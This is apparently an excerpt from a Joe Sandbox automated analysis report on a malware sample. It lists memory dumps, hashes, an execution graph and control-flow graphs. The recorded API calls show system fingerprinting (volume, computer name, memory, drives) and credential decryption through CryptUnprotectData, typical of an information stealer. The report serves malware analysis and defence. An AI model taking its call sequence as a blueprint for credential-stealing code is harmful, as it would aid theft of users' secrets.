                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountCriticalInitializeSectionSpin
                                                                                                          • String ID: InitializeCriticalSectionEx$&p
                                                                                                          • API String ID: 2593887523-2196734458
                                                                                                          • Opcode ID: 8281a07baf85c603b8e6f4ed81e680d083b9ffd808f4b8a4c793edf80e82f7ee
                                                                                                          • Instruction ID: edfc7435f95a602f5113fd715ab9849856b452a0742cea87ca3e5cc7730f87e8
                                                                                                          • Opcode Fuzzy Hash: 8281a07baf85c603b8e6f4ed81e680d083b9ffd808f4b8a4c793edf80e82f7ee
                                                                                                          • Instruction Fuzzy Hash: 58E09271585228B7CF212F58DC05DDE3F25EB40B60B008020F918151A0C67A8AA1E680
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Alloc
                                                                                                          • String ID: FlsAlloc$&p
                                                                                                          • API String ID: 2773662609-1467455382
                                                                                                          • Opcode ID: 838ded46b62e4220e9a88b48e4b5345b85c012c965b4c4fe9ec7fee1f7e8273a
                                                                                                          • Instruction ID: a64e820670b1baa84581b6ed8aab62747cc0a12ffa5f03f6880354c40370659a
                                                                                                          • Opcode Fuzzy Hash: 838ded46b62e4220e9a88b48e4b5345b85c012c965b4c4fe9ec7fee1f7e8273a
                                                                                                          • Instruction Fuzzy Hash: 8AE0C271784338B38B346699BC0AEEE7D15DB40B70B008130FD09612D1D9AD5E91D2D9

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:16.1%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:46.3%
                                                                                                          Total number of Nodes:529
                                                                                                          Total number of Limit Nodes:43
                                                                                                          execution_graph 8068 41fb43 8069 41fb6f 8068->8069 8070 41fbda 8069->8070 8072 439e70 LdrInitializeThunk 8069->8072 8072->8069 8032 4142c9 8033 438700 RtlAllocateHeap 8032->8033 8034 4142d3 8033->8034 8036 439e70 LdrInitializeThunk 8034->8036 8036->8034 7970 41fa4f 7971 43d0e0 LdrInitializeThunk 7970->7971 7972 41fa76 7971->7972 7536 408450 7538 40845f 7536->7538 7537 40878f ExitProcess 7538->7537 7539 4084de GetCurrentProcessId GetCurrentThreadId 7538->7539 7542 408693 7538->7542 7540 408518 SHGetSpecialFolderPathW GetForegroundWindow 7539->7540 7540->7542 7542->7537 7543 40a850 7546 40a880 7543->7546 7544 40ad3d 7546->7544 7546->7546 7547 438720 7546->7547 7548 438733 7547->7548 7549 438735 7547->7549 7548->7544 7550 43873a RtlFreeHeap 7549->7550 7550->7544 8037 420ad0 SHEmptyRecycleBinW 7552 438750 7554 438770 7552->7554 7553 4387be 7553->7553 7555 438981 7553->7555 7563 438700 7553->7563 7554->7553 7562 439e70 LdrInitializeThunk 7554->7562 7558 438720 RtlFreeHeap 7558->7555 7559 43885f 7561 4388be 7559->7561 7566 439e70 LdrInitializeThunk 7559->7566 7561->7558 7562->7553 7567 43b2e0 7563->7567 7565 43870a RtlAllocateHeap 7565->7559 7566->7561 7568 43b2f0 7567->7568 7568->7565 7568->7568 7569 43a6d4 7570 43a700 7569->7570 7571 43a76e 7570->7571 7575 439e70 LdrInitializeThunk 7570->7575 7574 439e70 LdrInitializeThunk 7571->7574 7574->7571 7575->7571 7973 419058 7974 4191f8 7973->7974 7977 41924f 7973->7977 7978 418d10 7973->7978 7976 43ce50 LdrInitializeThunk 7974->7976 7975 43ce50 LdrInitializeThunk 7975->7974 7976->7974 7978->7973 7978->7974 7978->7975 7978->7977 7581 40d25e 7582 40d270 7581->7582 7585 435ac0 7582->7585 7584 40d350 7586 435af0 CoCreateInstance 7585->7586 7588 435d96 SysAllocString 7586->7588 7589 43618f 7586->7589 7592 435e46 7588->7592 7590 43619f GetVolumeInformationW 7589->7590 7599 4361bd 7590->7599 7593 43617e SysFreeString 7592->7593 7594 435e4e CoSetProxyBlanket 7592->7594 7593->7589 7595 436174 7594->7595 7596 435e6e SysAllocString 7594->7596 7595->7593 7598 435f30 7596->7598 7598->7598 7600 435f7b SysAllocString 7598->7600 7599->7584 7602 435fa2 7600->7602 7601 436163 SysFreeString SysFreeString 7601->7595 7602->7601 7603 436159 7602->7603 7604 435fe6 VariantInit 7602->7604 7603->7601 7606 436040 7604->7606 7605 436148 VariantClear 7605->7603 7606->7605 8038 4148e1 8039 4148e0 8038->8039 8039->8038 8040 4148ee 8039->8040 8044 439e70 LdrInitializeThunk 8039->8044 8045 439e70 LdrInitializeThunk 8040->8045 8043 4149eb 8044->8040 8045->8043 8073 421b60 8074 421b72 8073->8074 8082 421e92 8073->8082 8075 43cca0 LdrInitializeThunk 8074->8075 8074->8082 8076 421d0a 8075->8076 8080 421e27 8076->8080 8085 436330 8076->8085 8079 43cca0 LdrInitializeThunk 8079->8080 8081 43d0e0 LdrInitializeThunk 8080->8081 8080->8082 8084 421e51 8081->8084 8084->8082 8099 439e70 LdrInitializeThunk 8084->8099 8086 43cca0 LdrInitializeThunk 8085->8086 8087 43634e 8086->8087 8088 43641a 8087->8088 8090 4363d8 8087->8090 8092 438700 RtlAllocateHeap 8087->8092 8095 421e04 8087->8095 8091 438720 RtlFreeHeap 8088->8091 8089 438b70 LdrInitializeThunk 8089->8090 8090->8088 8090->8089 8093 4389b0 LdrInitializeThunk 8090->8093 8094 436420 8091->8094 8096 43636e 8092->8096 8093->8090 8094->8095 8101 439e70 LdrInitializeThunk 8094->8101 8095->8079 8095->8080 8096->8090 8100 439e70 LdrInitializeThunk 8096->8100 8099->8082 8100->8090 8101->8095 7607 4358e0 7609 435900 7607->7609 7608 435a5e 7611 43597e 7609->7611 7616 439e70 LdrInitializeThunk 7609->7616 7611->7608 7613 4359fe 7611->7613 7615 439e70 LdrInitializeThunk 7611->7615 7613->7608 7617 439e70 LdrInitializeThunk 7613->7617 7615->7613 7616->7611 7617->7608 8102 40c168 8103 438720 RtlFreeHeap 8102->8103 8104 40c16e 8103->8104 8105 438720 RtlFreeHeap 8104->8105 8106 40c186 8105->8106 8051 40d0ee GetSystemDirectoryW 8052 40d137 8051->8052 8053 438720 RtlFreeHeap 8052->8053 8054 40d172 8053->8054 8107 40cb70 GetPixel 7618 42c273 7619 42c2a0 7618->7619 7619->7619 7620 42c338 GetPhysicallyInstalledSystemMemory 7619->7620 7621 42c360 7620->7621 7621->7621 7622 420870 7623 42087e 7622->7623 7625 4208d0 7622->7625 7626 420990 7623->7626 7628 4209a0 7626->7628 7628->7628 7630 43ce50 7628->7630 7629 420a9f 7631 43ce70 7630->7631 7632 43cfbe 7631->7632 7634 439e70 LdrInitializeThunk 7631->7634 7632->7629 7634->7632 7635 43a0f1 7636 43a145 7635->7636 7637 43a56e 7636->7637 7639 439e70 LdrInitializeThunk 7636->7639 7639->7637 7640 420e70 7655 43cca0 7640->7655 7642 42168a 7643 420eb3 7643->7642 7644 438700 RtlAllocateHeap 7643->7644 7645 420ef1 7644->7645 7654 420f85 7645->7654 7659 439e70 LdrInitializeThunk 7645->7659 7647 4215e4 7648 438720 RtlFreeHeap 7647->7648 7650 4215f6 7648->7650 7649 438700 RtlAllocateHeap 7649->7654 7650->7642 7661 439e70 LdrInitializeThunk 7650->7661 7653 438720 RtlFreeHeap 7653->7654 7654->7647 7654->7649 7654->7653 7660 439e70 LdrInitializeThunk 7654->7660 7656 43ccc0 7655->7656 7657 43cdfe 7656->7657 7662 439e70 LdrInitializeThunk 7656->7662 7657->7643 7659->7645 7660->7654 7661->7650 7662->7657 8182 4369f0 8185 436a20 8182->8185 8183 43bc60 LdrInitializeThunk 8183->8185 8184 43c0b0 3 API calls 8184->8185 8185->8183 8185->8184 8186 436b58 8185->8186 8187 43c770 3 API calls 8185->8187 8189 439e70 LdrInitializeThunk 8185->8189 8187->8185 8189->8185 8108 417b75 8109 417b90 8108->8109 8111 417bee 8109->8111 8114 439e70 LdrInitializeThunk 8109->8114 8115 439e70 LdrInitializeThunk 8111->8115 8113 417cab 8114->8111 8115->8113 8190 4189f4 8191 418a09 8190->8191 8192 4191f8 8191->8192 8193 43ce50 LdrInitializeThunk 8191->8193 8195 41924f 8191->8195 8194 43ce50 LdrInitializeThunk 8192->8194 8193->8192 8194->8192 8055 42eaf4 8056 42eb24 SysAllocString 8055->8056 8058 42edeb 8056->8058 7979 41807b 7981 417fdf 7979->7981 7980 41812e 7981->7979 7981->7980 7982 43ce50 LdrInitializeThunk 7981->7982 7982->7981 7663 4103fa 7666 410418 7663->7666 7665 40eaa3 7666->7665 7667 414df0 7666->7667 7668 414e10 7667->7668 7668->7668 7669 43cca0 LdrInitializeThunk 7668->7669 7670 414f30 7669->7670 7671 414f59 7670->7671 7675 41510f 7670->7675 7678 4151c2 7670->7678 7680 414f96 7670->7680 7698 43d010 7670->7698 7671->7675 7671->7678 7671->7680 7702 43d0e0 7671->7702 7675->7680 7746 439e70 LdrInitializeThunk 7675->7746 7676 43d010 LdrInitializeThunk 7683 4152fd 7676->7683 7679 43cca0 LdrInitializeThunk 7678->7679 7679->7683 7680->7665 7680->7680 7681 41570a 7696 415802 7681->7696 7709 419890 7681->7709 7682 43d0e0 LdrInitializeThunk 7682->7683 7683->7676 7683->7680 7683->7681 7683->7682 7692 4156e0 CryptUnprotectData 7683->7692 7708 439e70 LdrInitializeThunk 7683->7708 7685 415f7b 7685->7685 7688 415f87 7685->7688 7749 439e70 LdrInitializeThunk 7685->7749 7688->7665 7690 415db2 7690->7685 7690->7688 7748 439e70 LdrInitializeThunk 7690->7748 7692->7680 7692->7681 7692->7683 7693 416ac2 7695 415cd2 7695->7690 7747 439e70 LdrInitializeThunk 7695->7747 7696->7680 7697 43ce50 LdrInitializeThunk 7696->7697 7697->7696 7700 43d030 7698->7700 7699 43d08e 7699->7671 7700->7699 7750 439e70 LdrInitializeThunk 7700->7750 7703 43d100 7702->7703 7706 43d179 7703->7706 7751 439e70 LdrInitializeThunk 7703->7751 7704 414f87 7704->7675 7704->7678 7704->7680 7704->7683 7706->7704 7752 439e70 LdrInitializeThunk 7706->7752 7708->7683 7710 4198c0 7709->7710 7715 41991e 7710->7715 7753 439e70 LdrInitializeThunk 7710->7753 7712 419a0e 7713 419aae 7712->7713 7738 415993 7712->7738 7755 439e70 LdrInitializeThunk 7712->7755 7716 438700 RtlAllocateHeap 7713->7716 7727 419beb 7713->7727 7715->7712 7754 439e70 LdrInitializeThunk 7715->7754 7720 419b09 7716->7720 7718 419b8f 7719 438720 RtlFreeHeap 7718->7719 7719->7727 7720->7718 7756 439e70 LdrInitializeThunk 7720->7756 7722 419f57 FreeLibrary 7726 419e07 7722->7726 7724 419e02 7724->7722 7725 419eb6 FreeLibrary 7724->7725 7729 419ee0 7725->7729 7726->7738 7758 439e70 LdrInitializeThunk 7726->7758 7727->7722 7727->7724 7727->7726 7727->7738 7757 439e70 LdrInitializeThunk 7727->7757 7731 419f52 7729->7731 7759 439e70 LdrInitializeThunk 7729->7759 7732 41a09e 7731->7732 7760 439e70 LdrInitializeThunk 7731->7760 7734 438700 RtlAllocateHeap 7732->7734 7732->7738 7737 41a117 7734->7737 7735 41a8cc 7736 438720 RtlFreeHeap 7735->7736 7736->7738 7745 41a19e 7737->7745 7761 439e70 LdrInitializeThunk 7737->7761 7738->7695 7738->7696 7742 439e70 LdrInitializeThunk 7742->7745 7743 438700 RtlAllocateHeap 7743->7745 7744 438720 RtlFreeHeap 7744->7745 7745->7735 7745->7742 7745->7743 7745->7744 7762 4389b0 7745->7762 7766 438b70 7745->7766 7746->7695 7747->7690 7748->7685 7749->7693 7750->7699 7751->7706 7752->7704 7753->7715 7754->7712 7755->7713 7756->7718 7757->7724 7758->7738 7759->7731 7760->7732 7761->7745 7763 438a72 7762->7763 7764 4389c2 7762->7764 7763->7745 7764->7763 7770 439e70 LdrInitializeThunk 7764->7770 7767 438bde 7766->7767 7768 438b7a 7766->7768 7767->7745 7768->7767 7771 439e70 LdrInitializeThunk 7768->7771 7770->7763 7771->7767 7983 425079 7985 425050 7983->7985 7984 43bc60 LdrInitializeThunk 7984->7985 7985->7983 7985->7984 7986 42553f 7985->7986 7987 425228 7985->7987 7988 425492 7985->7988 7989 425209 7985->7989 7990 425375 7985->7990 7998 425237 7985->7998 7999 425278 7985->7999 7996 43c770 3 API calls 7986->7996 7987->7986 7987->7988 7987->7990 7993 439df0 3 API calls 7987->7993 7987->7998 7987->7999 7995 43c770 3 API calls 7988->7995 7992 43c0b0 3 API calls 7989->7992 7991 43bc60 LdrInitializeThunk 7991->7999 7992->7987 7993->7999 7994 425480 8003 439e70 LdrInitializeThunk 7994->8003 7995->7986 7996->7998 8001 425303 7998->8001 8004 439e70 LdrInitializeThunk 7998->8004 7999->7986 7999->7988 7999->7990 7999->7991 7999->7994 7999->7998 8000 43bd90 3 API calls 7999->8000 8000->7999 8001->8001 8003->7988 8004->8001 7772 40e57f CoInitializeEx CoInitializeEx 8116 41917e 8117 419183 8116->8117 8118 438b70 LdrInitializeThunk 8117->8118 8119 41919e 8118->8119 8120 40b300 8121 40b508 8120->8121 8123 40b31a 8120->8123 8122 439df0 3 API calls 8122->8123 8123->8121 8123->8122 8124 40e701 8125 40e700 8124->8125 8125->8124 8127 40e70e 8125->8127 8131 439e70 LdrInitializeThunk 8125->8131 8129 40e904 8127->8129 8130 439e70 LdrInitializeThunk 8127->8130 8130->8127 8131->8127 7773 434907 7774 43b710 7773->7774 7775 434931 GetUserDefaultUILanguage 7774->7775 7776 43495c 7775->7776 8005 423206 8006 4232b0 8005->8006 8006->8006 8007 420e70 3 API calls 8006->8007 8008 4232d9 8007->8008 7782 42e704 CoSetProxyBlanket 8132 416b06 8134 416b22 8132->8134 8133 41703c 8139 416dbe 8134->8139 8154 439e70 LdrInitializeThunk 8134->8154 8135 416f42 8135->8135 8143 416fde 8135->8143 8156 439e70 LdrInitializeThunk 8135->8156 8137 416e6e 8137->8133 8137->8135 8140 4173db 8137->8140 8137->8143 8139->8133 8139->8135 8139->8137 8139->8143 8155 439e70 LdrInitializeThunk 8139->8155 8157 439e70 LdrInitializeThunk 8140->8157 8143->8133 8145 4174de 8143->8145 8158 439e70 LdrInitializeThunk 8143->8158 8147 41757e 8145->8147 8159 439e70 LdrInitializeThunk 8145->8159 8149 41761e 8147->8149 8160 439e70 LdrInitializeThunk 8147->8160 8151 4176be 8149->8151 8161 439e70 LdrInitializeThunk 8149->8161 8152 439e70 LdrInitializeThunk 8151->8152 8153 417919 8151->8153 8152->8151 8154->8139 8155->8137 8156->8143 8157->8143 8158->8145 8159->8147 8160->8149 8161->8151 8162 42db05 VariantClear VariantInit 8163 42dbfe 8162->8163 8063 42e08a VariantInit 8064 42e0f0 8063->8064 7788 43a09a GetForegroundWindow 7789 43bc00 7788->7789 7790 43a0a8 GetForegroundWindow 7789->7790 7791 43a0be 7790->7791 8196 43199d DeleteObject 8009 40cc21 8010 40e31b CoUninitialize 8009->8010 8197 4119a0 8203 4119ba 8197->8203 8198 4119c1 8199 438720 RtlFreeHeap 8199->8203 8200 439e70 LdrInitializeThunk 8200->8203 8203->8198 8203->8199 8203->8200 8204 43cae0 8203->8204 8208 43d270 8203->8208 8206 43cb00 8204->8206 8205 43cc3e 8205->8203 8206->8205 8214 439e70 LdrInitializeThunk 8206->8214 8209 43d290 8208->8209 8209->8209 8212 43d2fe 8209->8212 8215 439e70 LdrInitializeThunk 8209->8215 8210 43d3ae 8210->8203 8212->8210 8216 439e70 LdrInitializeThunk 8212->8216 8214->8205 8215->8212 8216->8210 7792 431a20 7793 431a25 7792->7793 7794 431a5b GetSystemMetrics GetSystemMetrics 7793->7794 7795 431a9a 7794->7795 8166 439920 8167 407f00 8166->8167 8168 43993e SHGetFileInfoW 8167->8168 7796 43a227 7797 43a250 7796->7797 7800 439e70 LdrInitializeThunk 7797->7800 7799 43a2f4 7800->7799 8011 422232 8012 42224a 8011->8012 8013 4222bc 8011->8013 8018 4224fd 8011->8018 8012->8012 8012->8013 8015 422abe 8012->8015 8012->8018 8022 439e70 LdrInitializeThunk 8012->8022 8025 439e70 LdrInitializeThunk 8015->8025 8017 422852 8017->8013 8024 439e70 LdrInitializeThunk 8017->8024 8018->8013 8018->8017 8023 439e70 LdrInitializeThunk 8018->8023 8019 422adc 8022->8012 8023->8018 8024->8017 8025->8019 8169 425b32 8170 438720 RtlFreeHeap 8169->8170 8171 425b38 8170->8171 8217 40e1b3 8218 40e1d0 8217->8218 8218->8218 8219 40e23e 8218->8219 8221 439e70 LdrInitializeThunk 8218->8221 8221->8219 8026 41b234 8027 41b260 8026->8027 8028 438720 RtlFreeHeap 8027->8028 8029 41b2c9 8028->8029 8029->8029 8172 428134 8175 428140 8172->8175 8174 4288ef 8175->8175 8176 439e70 LdrInitializeThunk 8175->8176 8176->8174 7801 42bb35 7802 43b710 7801->7802 7803 42bb45 GetComputerNameExA 7802->7803 7804 42bb90 GetComputerNameExA 7803->7804 7806 42bc70 7804->7806 7807 40e83a 7809 40e735 7807->7809 7808 40e904 7809->7807 7809->7808 7811 439e70 LdrInitializeThunk 7809->7811 7811->7809 7812 40e2bb CoInitializeSecurity CoInitializeSecurity 7813 42d0be 7814 42d0e2 7813->7814 7814->7814 7815 42d1bb FreeLibrary 7814->7815 7817 42d1ef 7815->7817 7816 42d2bb FreeLibrary 7817->7816 7817->7817 7818 40d8bd 7819 40d8c9 7818->7819 7840 422b70 7819->7840 7821 40d8cf 7848 4232f0 7821->7848 7823 40d8eb 7854 425020 7823->7854 7827 40d929 7884 427b00 7827->7884 7829 40d957 7830 422b70 2 API calls 7829->7830 7831 40d992 7830->7831 7832 4232f0 3 API calls 7831->7832 7833 40d9ae 7832->7833 7834 425020 4 API calls 7833->7834 7835 40d9e3 7834->7835 7836 425b50 3 API calls 7835->7836 7837 40d9ec 7836->7837 7838 427b00 LdrInitializeThunk 7837->7838 7839 40da1a 7838->7839 7846 422bd0 7840->7846 7841 422cc3 7841->7821 7842 422f51 GetLogicalDrives 7845 43ce50 LdrInitializeThunk 7842->7845 7843 43ce50 LdrInitializeThunk 7844 422e01 7843->7844 7844->7842 7844->7844 7847 422f67 7845->7847 7846->7841 7846->7843 7846->7844 7846->7846 7849 423390 7848->7849 7849->7849 7850 423517 7849->7850 7852 423468 7849->7852 7894 43c0b0 7849->7894 7850->7823 7890 41f060 7852->7890 7856 425050 7854->7856 7857 42553f 7856->7857 7858 425228 7856->7858 7859 425492 7856->7859 7860 425209 7856->7860 7861 40d920 7856->7861 7868 425237 7856->7868 7870 425278 7856->7870 7924 43bc60 7856->7924 7867 43c770 3 API calls 7857->7867 7858->7857 7858->7859 7858->7861 7858->7868 7858->7870 7928 439df0 7858->7928 7950 43c770 7859->7950 7863 43c0b0 3 API calls 7860->7863 7874 425b50 7861->7874 7862 43bc60 LdrInitializeThunk 7862->7870 7863->7858 7865 425480 7949 439e70 LdrInitializeThunk 7865->7949 7867->7868 7872 425303 7868->7872 7960 439e70 LdrInitializeThunk 7868->7960 7870->7857 7870->7859 7870->7861 7870->7862 7870->7865 7870->7868 7939 43bd90 7870->7939 7872->7872 7875 425b70 7874->7875 7876 425bae 7875->7876 7966 439e70 LdrInitializeThunk 7875->7966 7877 425f75 7876->7877 7878 438700 RtlAllocateHeap 7876->7878 7877->7827 7881 425c0b 7878->7881 7880 438720 RtlFreeHeap 7880->7877 7883 425c5e 7881->7883 7967 439e70 LdrInitializeThunk 7881->7967 7883->7880 7886 4277f7 7884->7886 7885 427902 7885->7829 7886->7885 7888 4278f3 7886->7888 7968 439e70 LdrInitializeThunk 7886->7968 7969 439e70 LdrInitializeThunk 7888->7969 7891 41f090 7890->7891 7891->7891 7904 420e70 7891->7904 7895 43c0d0 7894->7895 7897 43c12e 7895->7897 7922 439e70 LdrInitializeThunk 7895->7922 7896 43c3ec 7896->7849 7897->7896 7899 438700 RtlAllocateHeap 7897->7899 7900 43c1c5 7899->7900 7903 43c24e 7900->7903 7923 439e70 LdrInitializeThunk 7900->7923 7901 438720 RtlFreeHeap 7901->7896 7903->7901 7905 43cca0 LdrInitializeThunk 7904->7905 7907 420eb3 7905->7907 7906 41f0d3 7906->7850 7907->7906 7908 438700 RtlAllocateHeap 7907->7908 7909 420ef1 7908->7909 7918 420f85 7909->7918 7919 439e70 LdrInitializeThunk 7909->7919 7911 4215e4 7912 438720 RtlFreeHeap 7911->7912 7914 4215f6 7912->7914 7913 438700 RtlAllocateHeap 7913->7918 7914->7906 7921 439e70 LdrInitializeThunk 7914->7921 7917 438720 RtlFreeHeap 7917->7918 7918->7911 7918->7913 7918->7917 7920 439e70 LdrInitializeThunk 7918->7920 7919->7909 7920->7918 7921->7914 7922->7897 7923->7903 7926 43bc80 7924->7926 7925 43bd5f 7925->7856 7926->7925 7961 439e70 LdrInitializeThunk 7926->7961 7929 439e55 7928->7929 7930 439e36 7928->7930 7931 439e2a 7928->7931 7932 439e16 7928->7932 7933 439e08 7928->7933 7934 439e46 7928->7934 7929->7870 7936 438700 RtlAllocateHeap 7930->7936 7935 438700 RtlAllocateHeap 7931->7935 7938 439e1b RtlReAllocateHeap 7932->7938 7933->7929 7933->7932 7933->7934 7937 438720 RtlFreeHeap 7934->7937 7935->7930 7936->7934 7937->7929 7938->7929 7940 43bdb0 7939->7940 7942 43be0e 7940->7942 7962 439e70 LdrInitializeThunk 7940->7962 7941 43c094 7941->7870 7942->7941 7943 438700 RtlAllocateHeap 7942->7943 7945 43beac 7943->7945 7948 43bf43 7945->7948 7963 439e70 LdrInitializeThunk 7945->7963 7946 438720 RtlFreeHeap 7946->7941 7948->7946 7948->7948 7949->7859 7951 43c781 7950->7951 7952 43c8ae 7951->7952 7964 439e70 LdrInitializeThunk 7951->7964 7953 43cac9 7952->7953 7954 438700 RtlAllocateHeap 7952->7954 7953->7857 7956 43c91e 7954->7956 7959 43c9fe 7956->7959 7965 439e70 LdrInitializeThunk 7956->7965 7957 438720 RtlFreeHeap 7957->7953 7959->7957 7960->7872 7961->7925 7962->7942 7963->7948 7964->7952 7965->7959 7966->7876 7967->7883 7968->7886 7969->7885

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 435ac0-435ae1 1 435af0-435b25 0->1 1->1 2 435b27-435b35 1->2 3 435b40-435bae 2->3 3->3 4 435bb0-435bef 3->4 5 435bf0-435c02 4->5 5->5 6 435c04-435c1d 5->6 8 435c23-435c2f 6->8 9 435cea-435cf5 6->9 10 435c30-435c5d 8->10 11 435d00-435d34 9->11 10->10 12 435c5f-435c72 10->12 11->11 13 435d36-435d90 CoCreateInstance 11->13 14 435c80-435cda 12->14 15 435d96-435dc9 13->15 16 43618f-4361bb call 43b710 GetVolumeInformationW 13->16 14->14 18 435cdc-435ce6 14->18 19 435dd0-435e1b 15->19 22 4361c5-4361ca 16->22 23 4361bd-4361c1 16->23 18->9 19->19 21 435e1d-435e48 SysAllocString 19->21 28 43617e-43618b SysFreeString 21->28 29 435e4e-435e68 CoSetProxyBlanket 21->29 24 4361dd-4361e4 22->24 23->22 26 4361f0-436205 24->26 27 4361e6-4361ed 24->27 30 436210-436235 26->30 27->26 28->16 31 436174-43617a 29->31 32 435e6e-435e7e 29->32 30->30 33 436237-436274 30->33 31->28 34 435e80-435eb8 32->34 36 436280-4362b1 33->36 34->34 35 435eba-435f2b SysAllocString 34->35 37 435f30-435f79 35->37 36->36 38 4362b3-4362e7 call 41ddb0 36->38 37->37 39 435f7b-435fa4 SysAllocString 37->39 43 4362f0-4362f8 38->43 45 436163-436172 SysFreeString * 2 39->45 46 435faa-435fcc 39->46 43->43 44 4362fa-436308 43->44 47 4361d0-4361d7 44->47 48 43630e-43631e call 407f00 44->48 45->31 53 435fd2-435fd5 46->53 54 436159-43615f 46->54 47->24 50 436323-43632a 47->50 48->47 53->54 55 435fdb-435fe0 53->55 54->45 55->54 56 435fe6-43603a VariantInit 55->56 57 436040-43605f 56->57 57->57 58 436061-436077 57->58 59 43607b-43607d 58->59 60 436083-436089 59->60 61 436148-436155 VariantClear 59->61 60->61 62 43608f-43609d 60->62 61->54 63 43609f-4360a4 62->63 64 4360dd 62->64 65 4360bc-4360c0 63->65 66 4360df-436107 call 407e80 call 408be0 64->66 67 4360c2-4360cb 65->67 68 4360b0 65->68 77 436109 66->77 78 43610e-43611a 66->78 71 4360d2-4360d6 67->71 72 4360cd-4360d0 67->72 70 4360b1-4360ba 68->70 70->65 70->66 71->70 74 4360d8-4360db 71->74 72->70 74->70 77->78 79 436121-436144 call 407eb0 call 407e90 78->79 80 43611c 78->80 79->61 80->79
                                                                                                          APIs
                                                                                                          • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C,00000000), ref: 00435D88
                                                                                                          • SysAllocString.OLEAUT32(3<), ref: 00435E22
                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00435E60
                                                                                                          • SysAllocString.OLEAUT32(3<), ref: 00435EBB
                                                                                                          • SysAllocString.OLEAUT32(D793D587), ref: 00435F80
                                                                                                          • VariantInit.OLEAUT32(lefg), ref: 00435FEB
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00436149
                                                                                                          • SysFreeString.OLEAUT32 ref: 0043616C
                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00436172
                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0043617F
                                                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,9F4D9D79,00000000,00000000,00000000,00000000), ref: 004361B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                          • String ID: 3<$@!H#$D%`'$J9e;$a-N/$lefg$z)e+$~=w?
                                                                                                          • API String ID: 2573436264-614847132
                                                                                                          • Opcode ID: aa41e92751e4ad253c5f1a9c683b43f2ce376066fa649893cf1af7fd8abf9e82
                                                                                                          • Instruction ID: 27ff078a4b010ea1a9290b23d64d5601a8c120cf7f7afa5e5ced33b88d3c7e24
                                                                                                          • Opcode Fuzzy Hash: aa41e92751e4ad253c5f1a9c683b43f2ce376066fa649893cf1af7fd8abf9e82
                                                                                                          • Instruction Fuzzy Hash: B32221726083009FD314CF28C885B5BBBE6EFC9314F19992DE995873A2D779D805CB86

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 301 40b75e-40b93e 302 40b940-40b95f 301->302 302->302 303 40b961-40bb7f 302->303 305 40bb80-40bb9f 303->305 305->305 306 40bba1-40bba9 305->306 307 40bbad-40bbc0 306->307
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: !h=j$#HiJ$+p:r$0xz$2lMn$V(v*$ep$sT+V${$R&$~,s.$|+~
                                                                                                          • API String ID: 0-1833152483
                                                                                                          • Opcode ID: c195b33de5a408b3cc8a918af6e40a89a6b5ff3033b9111d650288c95cdd91a2
                                                                                                          • Instruction ID: daa0f7465a0f9da4cdcdf7ddd26bc493a1dc22f5afff9cae4a57350bad4ce2c5
                                                                                                          • Opcode Fuzzy Hash: c195b33de5a408b3cc8a918af6e40a89a6b5ff3033b9111d650288c95cdd91a2
